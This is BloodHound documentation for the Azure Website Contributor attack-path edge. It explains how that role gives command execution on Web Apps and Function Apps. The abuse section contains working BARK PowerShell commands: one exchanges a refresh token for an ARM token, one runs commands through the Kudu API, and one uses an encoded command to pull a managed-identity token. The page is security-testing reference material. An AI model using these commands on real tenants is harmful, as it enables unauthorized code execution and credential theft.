> ## Documentation Index > Fetch the complete documentation index at: https://bloodhound.specterops.io/llms.txt > Use this file to discover all available pages before exploring further. # AZWebsiteContributor > The Website Contributor role grants full control of the target Function App or Web App. Full control of either of those types of resources allows for arbitrary command execution against the target resoruce. Applies to BloodHound Enterprise and CE ## Abuse Info You can use BARK’s Invoke-AzureRMWebAppShellCommand function to execute commands on a target Web App. You can use BARK’s New-PowerShellFunctionAppFunction, Get-AzureFunctionAppMasterKeys, and Get-AzureFunctionOutput functions to execute arbitrary commands against a target Function App. These functions require you to supply an Azure Resource Manager scoped JWT associated with the principal that has the privilege to execute commands on the web app or function app. There are several ways to acquire a JWT. For example, you may use BARK’s Get-ARMTokenWithRefreshToken to acquire an Azure RM-scoped JWT by supplying a refresh token: ```bash theme={null} $ARMToken = Get-ARMTokenWithRefreshToken ` -RefreshToken "0.ARwA6WgJJ9X2qk..." ` -TenantID "contoso.onmicrosoft.com" ``` Now you can use BARK’s Invoke-AzureRMWebAppShellCommand function to execute a command against the target Web App. For example, to run a simple “whoami” command: ```bash theme={null} Invoke-AzureRMWebAppShellCommand ` -KuduURI "https://mycoolwindowswebapp.scm.azurewebsites.net/api/command" ` -Token $ARMToken ` -Command "whoami" ``` If the Web App has a managed identity assignments, you can use BARK’s Invoke-AzureRMWebAppShellCommand function to retrieve a JWT for the managed identity Service Principal like this: ```bash theme={null} PS C:\> $PowerShellCommand = $headers=@{"X-IDENTITY-HEADER"=$env:IDENTITY_HEADER} $response = Invoke-WebRequest -UseBasicParsing -Uri "$($env:IDENTITY_ENDPOINT)?resource=https://storage.azure.com/&api-version=2019-08-01" -Headers $headers $response.RawContent PS C:\> $base64Cmd = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($PowerShellCommand)) PS C:\> $Command = "powershell -enc $($base64Cmd)" PS C:\> Invoke-AzureRMWebAppShellCommand ` -KuduURI "https://mycoolwindowswebapp.scm.azurewebsites.net/api/command" ` -token $ARMToken ` -Command $Command ``` If successful, the output will include a JWT for the managed identity service principal. ## Opsec Considerations This will depend on which particular abuse you perform, but in general Azure will create a log event for each abuse. ## References * [https://github.com/BloodHoundAD/BARK](https://github.com/BloodHoundAD/BARK) * [https://www.netspi.com/blog/technical/cloud-penetration-testing/lateral-movement-azure-app-services/](https://www.netspi.com/blog/technical/cloud-penetration-testing/lateral-movement-azure-app-services/) * [https://specterops.io/blog/2023/02/15/abusing-azure-app-service-managed-identity-assignments/](https://specterops.io/blog/2023/02/15/abusing-azure-app-service-managed-identity-assignments/) * [https://specterops.io/blog/2023/04/18/introducing-bloodhound-4-3-get-global-admin-more-often/](https://specterops.io/blog/2023/04/18/introducing-bloodhound-4-3-get-global-admin-more-often/)